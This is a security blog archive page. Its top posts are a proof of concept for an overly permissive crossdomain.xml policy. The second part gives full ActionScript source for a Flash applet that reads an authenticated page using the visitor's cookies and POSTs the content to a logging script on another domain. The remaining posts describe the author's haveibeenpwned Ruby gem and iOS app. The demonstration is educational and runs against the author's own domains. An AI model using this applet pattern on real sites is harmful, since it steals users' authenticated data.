Liberal Crossdomain.xml Example- Part 2

As a followup to Liberal Crossdomain.xml Exploit Example – Part 1, this is the source for the Flash app.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
package {
 import flash.display.Sprite;
 import flash.events.*;
 import flash.net.URLRequestMethod;
 import flash.net.URLRequest;
 import flash.net.URLLoader;
 
 public class flasher extends Sprite {
  public function flasher() {
   // Target URL from where the data is to be retrieved
   var readFrom:String = "http://rubysecurity.info/login/info.php";
   var readRequest:URLRequest = new URLRequest(readFrom);
   var getLoader:URLLoader = new URLLoader();
   getLoader.addEventListener(Event.COMPLETE, eventHandler);
   try 
   {
    getLoader.load(readRequest);
   } 
   catch (error:Error) 
   {
   }
  }
 
  private function eventHandler(event:Event):void 
  { 
   // URL to which retrieved data is to be sent
   var sendTo:String = "http://injectionvector.com/flasher/log.php"
   var sendRequest:URLRequest = new URLRequest(sendTo);
   sendRequest.method = URLRequestMethod.POST;
   sendRequest.data = event.target.data;
   var sendLoader:URLLoader = new URLLoader();
   try 
   {
    sendLoader.load(sendRequest);
   } 
   catch (error:Error) 
   {
   }
  }
 }
}

It’s really a fairly simple Flash applet. The class is called flasher and extends Sprite. Sprite is a base class for UI components that don’t use the timeline. In the constructor it creates a URLRequest object to data from the location specified in the readFrom variable via a URLLoader object. It then sets an event handler, called eventhandler, that is called when that read is done. When the read is done, it then basically does the same thing, but posts to the variable specified in sendTo and sets the body of the request to be the data received from the first step.

Note: This is based off an example that I found, but have misplaced. Once found, I will update the post to reference it.

Posted in Security | Leave a comment

Liberal Crossdomain.xml Exploit Example – Part 1

So, I decided to whip up this PoC of a liberal crossdomain.xml policy and what you can do with it. It’s been on my mind recently and thought a tangible example would help solidify in mind some of the possibilities. First, the basics-

What is a crossdomain.xml file?

A crossdomain.xml file essentially lets a domain specify the domains from which flash applets are loaded that are allowed to access it. The domain(s) that the crossdomain.xml file specifies are the domain from which the applet is loaded, not the domain that references the flash file.

Why does this matter?

Keep in mind that when a flash applet makes a call to retrieve data from a domain, the browser includes any cookies for that domain with the call. So, if it’s a domain that you’re authenticated with, then the flash applet will have the same access to that domain as the user does when accessing the site.

A working example

There are 2 domains for this example- rubysecurity.info and injectionvector.com. These are both domains that I own and have used for this demo.

Try going to http://rubysecurity.info/login/info.php. You will get a message that looks like this-

You are not logged in. Please login

because you are not logged in. That page requires you to be authenticated to view it. (In this cause “authenticated” means a cookie is set with your username:password in it)

Then go to http://rubysecurity.info/login and input anything as the user name and anything as the password. In my example, I used “chs” for both. You will be redirected to http://rubysecurity.info/login/info.php with a message that looks like-

Thanks for logging in! Your credentials are: chs:chs. Do not share them with others.  You must be authenticated to view this page.

Since you are authenticated, it lets you get to that page and shows you your username:password in this example. In a real world site it could be a page that shows you bank balances, sensitive data, etc.

Now, in another browser tab open http://injectionvector.com/flasher. It appears that nothing happens. But, in the background it connected to http://rubysecurity.info/login/info.php, got the response, and logged it.

You can see the results at http://injectionvector.com/flasher/readlog.php

Currently it looks like-

Thanks for logging in! Your credentials are: chs:chs. Do not share them with others. You must be authenticated to view this page.

So, the flash applet that I wrote on http://injectionvector.com/flasher connected to http://rubysecurity.info/login/info.php and pulled the content utilizing your existing session with rubysecurity.info.

Why did that happen?

The reason this happened was because rubysecurity.info had a liberal crossdomain.xml policy. In this example, it lets any flash applet connect. It looks like-

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

When a flash applet tries to connect to a domain, the flash container attempts to retrieve crossdomain.xml and applies the policy it contains. Since the above one allows access from any domain, the flash applet from injectionvector.com was allowed to connect, access the page, and log the results.

More to come…

Posted in Security | 4 Comments

New version of iPwnedCheck is in the App Store! Adds breach details and other enhancements

Version 1.3 has been released and is in the App Store.

Enhancements:

  • Click on a breach name to get more details
  • Internationalized date formatting
  • Removes autocapitalization/autocorrection when adding sites
  • Checks for duplicate usernames/emails already tracked

Get it at-

https://itunes.apple.com/us/app/ipwnedcheck/id826895005

Posted in Ruby, Security | Leave a comment

iPwnedCheck is in the App Store! It’s an #ios app that queries @haveibeenpwned by @troyhunt

I’m excited to announce that iPwnedCheck is now in the ios app store! It’s an ios app that uses the api to query multiple usernames/email addresses against http://haveibeenpwned.com.

Get it here-

https://itunes.apple.com/us/app/ipwnedcheck/id826895005?ls=1&mt=8

Please let me know if you have any comments/questions/complaints!

Posted in Ruby, Security | Leave a comment

Unauthorized Access

Dear Friend from 175.126.111.48,

Please stop trying to log in to this site.

Thanks,

Management

Posted in Security | Leave a comment

PwnedCheck updated to also check for Snapchat

PwnedCheck is a ruby gem that I wrote that checks an email address, phone number, or username against the new site by Troy Hunt called haveibeenpwned.com. His site aggregates data from breaches and allows you to check to see if your data has been compromised. Use it as follows-

Installation

gem install PwnedCheck

Usage:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
require 'pwnedcheck'
 
# The 4 cases.
# foo@bar.com is a valid address on the site
# foo232323ce23ewd@bar.com is a valid address, but not on the site
# foo.bar.com is an invalid format
# mralexgray is a user id in snapchat
list = ['foo@bar.com', 'foo232323ce23ewd@bar.com', 'foo.bar.com', 'mralexgray']
 
list.each do |item|
  begin
    sites = PwnedCheck::check(item)
    if sites.length == 0
      puts "#{item} --> Not found on http://haveibeenpwned.com"
    else
      sites.each do |site|
        puts "#{item} --> #{site}"
      end
    end
  rescue PwnedCheck::InvalidEmail => e
    puts "#{item} --> #{e.message}"
  end
end

Output:

foo@bar.com --> Adobe
foo@bar.com --> Gawker
foo@bar.com --> Stratfor
foo232323ce23ewd@bar.com --> Not found on http://haveibeenpwned.com
foo.bar.com --> Not found on http://haveibeenpwned.com
mralexgray --> Snapchat

The code is available at http://github.com/sampsonc/PwnedCheck and the gem page is http://rubygems.org/gems/PwnedCheck.

Posted in Open Source, Ruby, Security | Leave a comment

PwnedCheck passed 1000 downloads!

I’m so excited. My first experiment with creating and publishing a ruby gem seems to have been successful! As of this post it’s been downloaded 1069 times in the past 4 days. PwnedCheck is a ruby gem that I wrote that checks an email address against the new site by Troy Hunt called haveibeenpwned.com. His site aggregates password dumps from breaches and allows you to check to see if your password has been compromised. Use it as follows-

Installation

gem install PwnedCheck

Usage:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
require 'pwnedcheck'
 
# The 3 cases.
# foo@bar.com is a valid address on the site
# foo232323ce23ewd@bar.com is a valid address, but not on the site
# foo.bar.com is an invalid format
addresses = ['foo@bar.com', 'foo232323ce23ewd@bar.com', 'foo.bar.com']
 
addresses.each do |address|
  begin
    sites = PwnedCheck::check(address)
    if sites.length == 0
      puts "#{address} --> Not found on http://haveibeenpwned.com"
    else
      sites.each do |site|
        puts "#{address} --> #{site}"
      end
    end
  rescue PwnedCheck::InvalidEmail => e
    puts "#{address} --> #{e.message}"
  end
end

The code is available at http://github.com/sampsonc/PwnedCheck and the gem page is http://rubygems.org/gems/PwnedCheck.

Posted in Open Source, Ruby, Security | Leave a comment

New ruby gem to access @haveibeenpwned.

So, I decided to figure out how to create a ruby gem and decided to start with a simple gem that checks an email address against http://haveibeenpwned.com.

Installation

gem install PwnedCheck

Usage:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
require 'pwnedcheck'
 
# The 3 cases.
# foo@bar.com is a valid address on the site
# foo232323ce23ewd@bar.com is a valid address, but not on the site
# foo.bar.com is an invalid format
addresses = ['foo@bar.com', 'foo232323ce23ewd@bar.com', 'foo.bar.com']
 
addresses.each do |address|
  begin
    sites = PwnedCheck::check(address)
    if sites.length == 0
      puts "#{address} --> Not found on http://haveibeenpwned.com"
    else
      sites.each do |site|
        puts "#{address} --> #{site}"
      end
    end
  rescue PwnedCheck::InvalidEmail => e
    puts "#{address} --> #{e.message}"
  end
end

The code is available at http://github.com/sampsonc/PwnedCheck and the gem page is http://rubygems.org/gems/PwnedCheck.

Let me know what you think!

Posted in Ruby, Security | Leave a comment

Testing #WordPress cache plugins. What’s the best?

So far have tried-

  • W3 Total Cache
  • WP Super Cache
  • Hyper Cache
Posted in Wordpress | Leave a comment

#ruby code to access the @haveibeenpwned api.

This is just some ruby I whipped up really quickly to access the API of havibeenpwned.com which is a cool new site by Troy Hunt that aggregates password dump information from breaches and allows you to search for your email address.

I think the code is pretty self-explanatory, but comment or send me a line if you have questions/suggestions/criticism/etc!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
require 'mechanize'
require 'addressable/uri'
 
agent = Mechanize.new
 
File.open('addresses.txt').each do |line|
  line = line.chomp
  begin
    target = "http://haveibeenpwned.com/api/breachedaccount/#{line}"
    page = agent.get Addressable::URI.parse(target)
  rescue Mechanize::ResponseCodeError  => e
    case e.response_code
      when '404'
        puts "#{line} => Not Found"
      when '400'
        puts "#{line} => Bad Request"
      else
        puts "#{line} => #{e.message}"
     end
  else
    puts "#{line} => #{page.content}"
  end
end
Posted in Code, Ruby | 1 Comment